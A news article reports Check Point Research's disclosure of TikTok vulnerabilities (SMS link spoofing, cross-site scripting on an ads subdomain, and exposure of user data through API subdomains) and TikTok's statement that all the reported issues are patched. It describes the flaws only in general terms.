TikTok faces data breach risk, company assures user issues patched in latest app update

Check Point Research has over the past few months seen evidence of potential risks embedded within the TikTok mobile application. The platform said it informed TikTok developers about the vulnerabilities, and they promptly devised a solution to plug the gaps.

In its report, ‘Tik or Tok? Is TikTok secure enough?’ the platform listed and detailed multiple vulnerabilities that its research teams discovered within the application.

It listed the vulnerabilities as allowing attackers to delete videos, upload unauthorised videos, make private 'hidden' videos public, and reveal personal information saved on the account such as private email addresses.

Till October last year, TikTok was one of the world’s most downloaded apps with over a billion users. The potential for a data breach is a matter of concern as a bulk of the app’s user base consists of children and teenagers, who share, save and keep private (sometimes very sensitive) videos of themselves and their loved ones.

SMS link spoofing

Detailing the vulnerabilities, Check Point said it was possible to send spoofed SMSes to any phone number on behalf of TikTok via the app’s main site: www.tiktok.com. Attackers could use this SMS function to send users custom malicious links, which when clicked on redirects the user to a web server controlled by the attacker – making it possible for attackers to send requests on behalf of the user.

Cross-site scripting (XSS)

The researchers further found that Tiktok’s subdomain --https://ads.tiktok.com -- is vulnerable to XSS attacks, a type of attack in which malicious scripts are injected into otherwise benign and trusted websites and allows the attacker to code and perform actions on behalf of the victim, without his or her consent.

Sensitive data exposure

Check Point also learned that attackers could make requests using the app’s subdomains -- https://api-t.tiktok.com and https://api-m.tiktok.com -- to reveal sensitive information about the user including email addresses, payment information and birth dates.

Check Point Research stated that it informed TikTok developers about the vulnerabilities, and they promptly devised a solution to plug the gaps.

TikTok on its part told the Hindu BusinessLine that it is committed to protecting user data and has patched all issues reported by Check Point in its latest version of the app. “We encourage responsible security researchers to privately disclose zero day vulnerabilities to us. Before public disclosure, Check Point agreed that all reported issues were patched in the latest version of our app,” Luke Deshotels, PhD, TikTok Security Team told the paper.

Download your money calendar for 2022-23 here and keep your dates with your moneybox, investments, taxes